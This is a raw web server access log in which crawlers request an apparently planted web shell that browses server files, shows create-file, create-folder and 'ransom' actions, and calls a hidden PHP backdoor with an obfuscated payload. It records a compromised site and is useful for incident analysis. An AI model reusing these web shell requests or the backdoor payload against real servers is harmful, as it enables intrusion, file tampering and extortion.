20.171.207.175 - - [15/Jun/2025:09:07:16 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fseo-redirect.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 9422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:16 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FExtUtils%3A%3AMM.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:18 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Flarge-info.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:18 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2Fidna_to_unicode_44i.3.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3470 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:19 -0400] "GET /chockfull836457504.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2128 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:19 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCPAN%3A%3APlugin.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.199.17 - - [15/Jun/2025:09:07:20 -0400] "GET /?filesrc=//bin/od&path=//bin HTTP/1.1" 200 50198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.66 - - [15/Jun/2025:09:07:21 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCrypt%3A%3ADES.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:21 -0400] "GET /chockfull836457504.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:07:22 -0400] "GET /chockfull836457504.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:07:22 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_cast5_cbc.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [15/Jun/2025:09:05:44 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939363334342p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393939323734342q3136386430313264303662646338343964303238666134646633356331343732222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
